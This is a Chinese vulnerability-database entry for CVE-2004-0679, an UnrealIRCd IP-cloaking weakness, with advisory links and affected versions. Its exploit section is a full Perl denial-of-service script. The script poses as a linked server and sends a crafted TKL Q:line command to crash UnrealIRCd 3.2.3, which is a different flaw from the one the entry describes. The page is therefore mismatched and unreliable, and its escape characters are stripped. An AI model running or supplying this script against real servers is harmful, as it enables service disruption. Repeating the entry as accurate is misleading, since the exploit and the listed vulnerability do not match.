Unreal IRCD Cloak.C IP地址泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1201436 漏洞类型 设计错误
发布时间 2004-07-05 更新时间 2009-07-12
CVE编号 CVE-2004-0679 CNNVD-ID CNNVD-200408-031
漏洞平台 N/A CVSS评分 5.0
|漏洞来源
https://www.securityfocus.com/bid/10663
https://cxsecurity.com/issue/WLB-2006030055
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200408-031
|漏洞详情
UnrealIRCd3.2或其他可能版本的IP伪装功能存在漏洞。该漏洞采用弱散列计划隐藏IP地址。远程攻击者使用暴力的方法来获得其他用户的IP地址。
|漏洞EXP
-Description-
UnrealIRCd 3.2.3 is vulnerable to strings sent from a linked server for adding/removing Q:lines with special characters. Could be sent through services.
Fixed as of version 3.2.4

-PoC-
#!/usr/bin/perl

# Denial of Service exploit for UnrealIRCd 3.2.3
# Successfully tested on both Win32 and Linux versions.
# admin (at) redneck.servebeer (dot) com [email concealed] (Brandon Milner)

use IO::Socket;
print ("UnrealIRCd Server-Link Denial of Service exploit PoC by Redneckn");

#################
#   Variables   #
#################
$spass = ("LinkPass");				# Link Password
$lserver = ("your.server.name");		# Local Server name
$rserver = ("remote.server.name");		# Link Server
$rport = (6667);                     		# Link Port
$snum = (6);					# Server numeric

#################
# Create socket #
#################
my $sock = new IO::Socket::INET (
	PeerAddr => $rserver,
	PeerPort => $rport,
	Proto => 'tcp',
);

#################
#    Connect    #
#################
die "Couldn't create socket to $rserver / $rport!n" unless $sock;
sleep 5;
print ("connected to server");
print $sock ("PASS $spassn");
print ("PASS $spassn");
print $sock ("SERVER $lserver 1 $snum :PoC by Redneckn");
print ("SERVER $lserver 1 $snum :PoC by Redneckn");
sleep 5;
print $sock ("TKL - qx08Q *x08PoCn");
print ("TKL - qx08Q *x08PoCn");
sleep 5;
|受影响的产品
Unreal UnrealIRCd 3.2 .0 beta 10 Unreal UnrealIRCd 3.2 Unreal UnrealIRCd 3.1.3 Unreal UnrealIRCd 3.1.1
|参考资料

来源:BID
名称:10663
链接:http://www.securityfocus.com/bid/10663
来源:XF
名称:unreal-ircd-information-disclosure(16610)
链接:http://xforce.iss.net/xforce/xfdb/16610
来源:www.unrealircd.com
链接:http://www.unrealircd.com/
来源:www.bandecon.com
链接:http://www.bandecon.com/advisory/unreal.txt
来源:BUGTRAQ
名称:20040705unrealircdipcloakingsubsystemvulnerability
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=108904813003166&w=2
来源:SREASON
名称:560
链接:http://securityreason.com/securityalert/560